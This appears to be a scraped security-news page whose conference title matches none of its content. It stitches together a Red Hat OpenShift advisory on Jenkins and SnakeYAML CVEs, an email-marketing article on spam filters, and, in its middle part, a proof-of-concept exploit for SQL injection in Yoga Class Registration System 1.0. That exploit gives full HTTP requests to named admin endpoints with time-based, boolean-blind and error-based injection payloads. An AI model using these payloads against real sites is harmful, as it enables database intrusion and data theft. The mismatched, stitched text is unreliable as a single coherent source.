Top Takeaways From CloudNativeSecurityCon 2023

Red Hat Security Advisory 2023-0777-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.9.56. Issues addressed include bypass, code execution, cross site request forgery, cross site scripting, denial of service, deserialization, and improper authorization vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Critical: OpenShift Container Platform 4.9.56 security update  
Advisory ID:       RHSA-2023:0777-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0777  
Issue date:        2023-02-22  
CVE Names:         CVE-2020-7692 CVE-2022-1471 CVE-2022-2048  
                   CVE-2022-25857 CVE-2022-30946 CVE-2022-30952  
                   CVE-2022-30953 CVE-2022-30954 CVE-2022-34174  
                   CVE-2022-36882 CVE-2022-36883 CVE-2022-36884  
                   CVE-2022-36885 CVE-2022-43401 CVE-2022-43402  
                   CVE-2022-43403 CVE-2022-43404 CVE-2022-43405  
                   CVE-2022-43406 CVE-2022-43407 CVE-2022-43408  
                   CVE-2022-43409 CVE-2022-45047 CVE-2022-45379  
                   CVE-2022-45380 CVE-2022-45381  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.9.56 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.9.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.9 - noarch

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.9.56. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:0778

Security Fix(es):

* jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins  
Script Security Plugin (CVE-2022-43401)

* jenkins-plugin/workflow-cps: Sandbox bypass vulnerabilities in Pipeline:  
Groovy Plugin (CVE-2022-43402)

* jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins  
Script Security Plugin (CVE-2022-43403)

* jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins  
Script Security Plugin (CVE-2022-43404)

* jenkins-plugin/pipeline-groovy-lib: Sandbox bypass vulnerability in  
Pipeline: Groovy Libraries Plugin (CVE-2022-43405)

* jenkins-plugin/workflow-cps-global-lib: Sandbox bypass vulnerability in  
Pipeline: Deprecated Groovy Libraries Plugin (CVE-2022-43406)

* google-oauth-client: missing PKCE support in accordance with the RFC for  
OAuth 2.0 for Native Apps can lead to improper authorization  
(CVE-2020-7692)

* SnakeYaml: Constructor Deserialization Remote Code Execution  
(CVE-2022-1471)

* snakeyaml: Denial of Service due to missing nested depth limitation for  
collections (CVE-2022-25857)

* jenkins-plugin/pipeline-input-step: CSRF protection for any URL can be  
bypassed in Pipeline: Input Step Plugin (CVE-2022-43407)

* mina-sshd: Java unsafe deserialization vulnerability (CVE-2022-45047)

* jenkins-plugin/script-security: Whole-script approval in Script Security  
Plugin vulnerable to SHA-1 collisions (CVE-2022-45379)

* jenkins-plugin/JUnit: Stored XSS vulnerability in JUnit Plugin  
(CVE-2022-45380)

* jenkins-plugin/pipeline-utility-steps: Arbitrary file read vulnerability  
in Pipeline Utility Steps Plugin (CVE-2022-45381)

* http2-server: Invalid HTTP/2 requests cause DoS (CVE-2022-2048)

* Jenkins plugin: CSRF vulnerability in Script Security Plugin  
(CVE-2022-30946)

* Jenkins plugin: User-scoped credentials exposed to other users by  
Pipeline SCM API for Blue Ocean Plugin (CVE-2022-30952)

* Jenkins plugin: CSRF vulnerability in Blue Ocean Plugin (CVE-2022-30953)

* Jenkins plugin: missing permission checks in Blue Ocean Plugin  
(CVE-2022-30954)

* jenkins: Observable timing discrepancy allows determining username  
validity (CVE-2022-34174)

* jenkins-plugin: Cross-site Request Forgery (CSRF) in  
org.jenkins-ci.plugins:git (CVE-2022-36882)

* jenkins plugin: Lack of authentication mechanism in Git Plugin webhook  
(CVE-2022-36883)

* jenkins plugin: Lack of authentication mechanism in Git Plugin webhook  
(CVE-2022-36884)

* jenkins plugin: Non-constant time webhook signature comparison in GitHub  
Plugin (CVE-2022-36885)

* jenkins-plugin/pipeline-stage-view: CSRF protection for any URL can be  
bypassed in Pipeline: Stage View Plugin (CVE-2022-43408)

* jenkins-plugin/workflow-support: Stored XSS vulnerability in Pipeline:  
Supporting APIs Plugin (CVE-2022-43409)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.9 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which  
will be updated shortly for this release, for important instructions on how  
to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

5. Bugs fixed (https://bugzilla.redhat.com/):

1856376 - CVE-2020-7692 google-oauth-client: missing PKCE support in accordance with the RFC for OAuth 2.0 for Native Apps can lead to improper authorization  
2116840 - CVE-2022-36882 jenkins-plugin: Cross-site Request Forgery (CSRF) in org.jenkins-ci.plugins:git  
2116952 - CVE-2022-2048 http2-server: Invalid HTTP/2 requests cause DoS  
2119643 - CVE-2022-30946 Jenkins plugin: CSRF vulnerability in Script Security Plugin  
2119645 - CVE-2022-30952 Jenkins plugin: User-scoped credentials exposed to other users by Pipeline SCM API for Blue Ocean Plugin  
2119646 - CVE-2022-30953 Jenkins plugin: CSRF vulnerability in Blue Ocean Plugin  
2119647 - CVE-2022-30954 Jenkins plugin: missing permission checks in Blue Ocean Plugin  
2119653 - CVE-2022-34174 jenkins: Observable timing discrepancy allows determining username validity  
2119656 - CVE-2022-36883 jenkins plugin: Lack of authentication mechanism in Git Plugin webhook  
2119657 - CVE-2022-36884 jenkins plugin: Lack of authentication mechanism in Git Plugin webhook  
2119658 - CVE-2022-36885 jenkins plugin: Non-constant time webhook signature comparison in GitHub Plugin  
2126789 - CVE-2022-25857 snakeyaml: Denial of Service due to missing nested depth limitation for collections  
2136370 - CVE-2022-43406 jenkins-plugin/workflow-cps-global-lib: Sandbox bypass vulnerability in Pipeline: Deprecated Groovy Libraries Plugin  
2136374 - CVE-2022-43405 jenkins-plugin/pipeline-groovy-lib: Sandbox bypass vulnerability in Pipeline: Groovy Libraries Plugin  
2136379 - CVE-2022-43402 jenkins-plugin/workflow-cps: Sandbox bypass vulnerabilities in Pipeline: Groovy Plugin  
2136381 - CVE-2022-43401 jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins Script Security Plugin  
2136382 - CVE-2022-43403 jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins Script Security Plugin  
2136383 - CVE-2022-43404 jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins Script Security Plugin  
2136386 - CVE-2022-43407 jenkins-plugin/pipeline-input-step: CSRF protection for any URL can be bypassed in Pipeline: Input Step Plugin  
2136388 - CVE-2022-43408 jenkins-plugin/pipeline-stage-view: CSRF protection for any URL can be bypassed in Pipeline: Stage View Plugin  
2136391 - CVE-2022-43409 jenkins-plugin/workflow-support: Stored XSS vulnerability in Pipeline: Supporting APIs Plugin  
2143086 - CVE-2022-45380 jenkins-plugin/JUnit: Stored XSS vulnerability in JUnit Plugin  
2143089 - CVE-2022-45381 jenkins-plugin/pipeline-utility-steps: Arbitrary file read vulnerability in Pipeline Utility Steps Plugin  
2143090 - CVE-2022-45379 jenkins-plugin/script-security: Whole-script approval in Script Security Plugin vulnerable to SHA-1 collisions  
2145194 - CVE-2022-45047 mina-sshd: Java unsafe deserialization vulnerability  
2150009 - CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution

6. Package List:

Red Hat OpenShift Container Platform 4.9:

Source:  
jenkins-2-plugins-4.9.1675668922-1.el8.src.rpm  
jenkins-2.361.1.1675668150-1.el8.src.rpm

noarch:  
jenkins-2-plugins-4.9.1675668922-1.el8.noarch.rpm  
jenkins-2.361.1.1675668150-1.el8.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2020-7692  
https://access.redhat.com/security/cve/CVE-2022-1471  
https://access.redhat.com/security/cve/CVE-2022-2048  
https://access.redhat.com/security/cve/CVE-2022-25857  
https://access.redhat.com/security/cve/CVE-2022-30946  
https://access.redhat.com/security/cve/CVE-2022-30952  
https://access.redhat.com/security/cve/CVE-2022-30953  
https://access.redhat.com/security/cve/CVE-2022-30954  
https://access.redhat.com/security/cve/CVE-2022-34174  
https://access.redhat.com/security/cve/CVE-2022-36882  
https://access.redhat.com/security/cve/CVE-2022-36883  
https://access.redhat.com/security/cve/CVE-2022-36884  
https://access.redhat.com/security/cve/CVE-2022-36885  
https://access.redhat.com/security/cve/CVE-2022-43401  
https://access.redhat.com/security/cve/CVE-2022-43402  
https://access.redhat.com/security/cve/CVE-2022-43403  
https://access.redhat.com/security/cve/CVE-2022-43404  
https://access.redhat.com/security/cve/CVE-2022-43405  
https://access.redhat.com/security/cve/CVE-2022-43406  
https://access.redhat.com/security/cve/CVE-2022-43407  
https://access.redhat.com/security/cve/CVE-2022-43408  
https://access.redhat.com/security/cve/CVE-2022-43409  
https://access.redhat.com/security/cve/CVE-2022-45047  
https://access.redhat.com/security/cve/CVE-2022-45379  
https://access.redhat.com/security/cve/CVE-2022-45380  
https://access.redhat.com/security/cve/CVE-2022-45381  
https://access.redhat.com/security/updates/classification/#critical  
https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/cHo9zjgjWX9erEAQifOQ/+M4FXZG+ePML+3vjwK+ASXu1PchhFJol7  
HhOixe/FzDqvXKos8udC9tMJWBEnu7xzFsp56A6JJ9o3Q4jR5m0wJp4YbXNn8xxb  
HrBAWK6dI15R6MigWTyna2PxQyn/5V2l2fAu52l7MGXQie8bDwNWPxuSejaqoGZN  
OODlg7ozLvdRUcBK71UQIx9uRd8N6Sn4zTT4S1Pb2EE3W5K2x/dQZzZBnHxeYOCj  
+JLgx2RePuC12ipNgrWLSB2WFIcnH1zZvxH/hsjySNeoYHx9mr/AMuABvhB6nris  
CF5uzHg+6l6g5a3gv27qvfobBJORcevTIE6mK6U96bOVKe7gcjfAMaEOAbHuEvoN  
FSRIvuNvLRXGJyUuW7k9XYbZVPMbdmG3iXjTEW2YFtvlP0jVDbrEcoADN7Bt8Nli  
TDhQN9SWnmOoctgYDp/p6jWFQxMBH93KB1XAxb/jMliIahxLJKwywyGZh8QdpcQb  
NLVP0rlURylukjUvAguSXNP6ITO9SLEBRgV5yySvFZn2AR1vIFe1icQ++Twuj+ZT  
+ZN1na54u2MMA02N2nfe+Al62DXN6tTs/Gc5cosB7a8QrZ8m66zyvhbaYn80ImXz  
SStSe8Yi1OIx4GhGwKjvjc9dxxqRyT51XdTvtCABg3pPX13lYm55ZG244rW5Xz9d  
UzzsYBllCNw=JUDO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0777-01

Yoga Class Registration System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: [CVE-2023-0982]# Tested on: Windows 11# PayloadGET /php-ycrs/admin/registrations/update_status.php?id=2'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer:http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin##Payload'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjUthe back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)# Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: ( CVE-2023-0981 )# Tested on: Windows 11```POST /php-ycrs/classes/Master.php?f=delete_class HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 6Origin: http://localhostConnection: closeReferer: http://localhost/php-ycrs/admin/?page=classesCookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originid=96'```# PayloadParameter: id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery -comment)    Payload: id=96' AND 2307=(SELECT (CASE WHEN (2307=2307) THEN 2307 ELSE(SELECT 8487 UNION SELECT 3172) END))-- -    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: id=96' AND (SELECT 4409 FROM(SELECTCOUNT(*),CONCAT(0x7162707671,(SELECT(ELT(4409=4409,1))),0x71716b6b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NiQL    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=96' AND (SELECT 9070 FROM (SELECT(SLEEP(5)))jayu)-- wkzQ# Exploit Title: Authenticated POST based SQL Injection when add class on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: ( CVE-2023-0982 )# Tested on: Windows 11##PayloadPOST /php-ycrs/classes/Master.php?f=save_registration HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------408548517113152447833471217322Content-Length: 286Origin: http://localhostConnection: closeReferer:http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------408548517113152447833471217322Content-Disposition: form-data; name="id"2'-----------------------------408548517113152447833471217322Content-Disposition: form-data; name="status"1-----------------------------408548517113152447833471217322--##Payload'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjUthe back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)

Yoga Class Registration System 1.0 SQL Injection

By Waqas
In this article, we’ll dive into the world of spam emails, highlighting the reason that email service providers are so vigilant and exploring exactly how marketing teams can prevent ending up in the spam pile.
This is a post from HackRead.com Read the original post: Proven Techniques for Effective Email Spam Filtering

Delivering malware and malicious attachments, email spam has a proven track record of devastating impact on businesses and unsuspecting users, which is why effective email spam filtering should be a vital part of your marketing and cybersecurity plan.

With the sheer quantity of emails that are sent out every single day, it’s hardly surprising that a huge quantity is actually spam. In fact, nearly 46% of all emails sent out every single day are spam, which accounts for well over 150 billion emails.

With the spam epidemic only getting worse over time, your marketing team needs to understand why emails go to spam in order to ensure your marketing communications end up in the right place.

Luckily, there are a number of tactics that reputable companies can use when attempting to avoid triggering the spam filter. 

In this article, we’ll dive into the world of spam emails, highlighting the reason that email service providers are so vigilant and exploring exactly how marketing teams can prevent ending up in the spam pile.

**Why Are Email Providers So Focused on Spam?**

Without a doubt, spam is one of the worst parts of the email. When we think of spam, we think of random messages that have absolutely nothing to do with us, often coming to us in poorly written English, or being almost illegible. While spam can be annoying, these messages are actually mostly harmless.

Google, Outlook, and other email service providers actually block the majority of spam based on it containing ransomware, malware, or being a phishing email. 95% of all cybersecurity breaches within business come from phishing emails, demonstrating just how powerful these can be as a vector of chaos.

For email service providers, their constant vigilance is an attempt to completely eradicate these malicious emails, stopping them from ever arriving in our accounts. Of course, the logic here is simple. Email services can’t control someone’s level of email literacy, and cannot trust them to avoid spam by themselves.

Therefore, by removing spam and malicious emails before it ever even reaches our email accounts, they can radically decrease the chance of any negative impacts from occurring. Yet, their technologies are far from perfect. They operate on a strict security policy, rejecting emails that show even the faintest signs of being fraudulent or spam.

That’s why it’s essential to understand these spam filters, allowing your marketing team to create emails that don’t accidentally trigger these filters. 

**Choose Subject Lines Carefully**

Your subject line is quite literally the first thing that a consumer is going to see, meaning you want to make it punchy and attention-grabbing. Yet, this is also the first thing that will pass through the spam filter, meaning you need to make sure it doesn’t get flagged.

A lot of the time, spam and phishing emails are after specific things – money, account details, passwords, etc. With that in mind, words and phrases that relate to these things are often going to instantly trigger the filter. Avoid things like:

*   Earn $
*   Earn more
*   Make Money
*   Password breach
*   Double your money

Anything that could be closely related to these scam endeavours will almost instantly be blocked. 

**Make Sure Your Emails Are Worth It**

Especially for newer businesses, email services may not be familiar with your IP address or your business as a whole. With this in mind, they’re going to keep a close eye on you if you suddenly start sending emails to hundreds of people. To ensure they look upon your address favourably, you need to keep your engagement rates up.

Gmail will track engagement rates to see if the content that a business is sending out is actually wanted by customers. If your engagement and opening rates are too low, Google will likely mark your business as spam.

To avoid this, make sure your emails are packed full of great content, delivering real value to the people you contact.

**Be Careful with Attachments**

Attachments are a fantastic vector for those with malicious intent to get a piece of software onto your computer. With that in mind, many email providers are hesitant to include attachments from unknown email addresses. If your company is new, be sure to forego attachments altogether until you build up a bit of a reputation for yourself.

While attachments won’t instantly trigger the spam filter, it’s always better to use a CTA button that goes directly to your website instead.

**Keep in Line with Regulations**

If your business isn’t already aware of compliance laws like GDPR, it’s time to bring yourself up to speed. Your emails need to include disclaimers and usage information to keep your consumers in the loop. Not only emails without these aspects much more likely to be marked as spam by email providers, but these emails could also get you in trouble down the line.

It’s always a good idea to understand the regulations for the territory that you work in and ensure that your emails are in-line with current recommendations. 

**Check Your Email Signatures**

There is a common misconception about email signatures within IT, that they instantly trigger emails to be sent to spam. This couldn’t be further from the truth, with email signatures actually helping to increase the return you’ll get from email campaigns.

From a customer’s perspective, a well-formatted email signature will demonstrate that you’re a professional company that’s committed to delivering great service. Including additional elements like other contact addresses and further information about your company will go a long way in providing you’re reputable.

That said, email signatures that aren’t formatted properly can become a problem for businesses. That’s why it’s always a good idea to make sure you’re using a secure email signature that will fly through the various firewalls that users have on their accounts. The best email signature provider services will never host your emails, and will always ensure that you align with the best GDPR recommendations.

If you notice that your marketing team reports a high bounce rate on outgoing emails, revising where you’re getting your email signatures from can help. 

**Final Thoughts**

For marketing teams, email is the holy grail of communication. Not only does this provide you with direct access to your audience, but it also allows for further analysis and data-driven optimization, which will make your strategies more effective over time.

Without a doubt, an email is a vital tool in our strategy book. But, without understanding spam filters and what they look for, you could end up doing more harm than good. Moving through the strategies and tips we’ve outlined on this list will point you in the right direction toward creating effective, profitable, and spam filter-cleaning email marketing campaigns.

1.  Gmail’s Spam Filter Not Impenetrable For Hackers
2.  Google Blocks 99.9% of Gmail Phishing and Spam Emails
3.  New Spam Campaign Spreading Dridex Banking Malware
4.  It’s Google.com not ɢoogle.com; beware of the spam domain
5.  unCAPTCHA algorithm Crack Google’s AI System reCAPTCHA

Tag

#google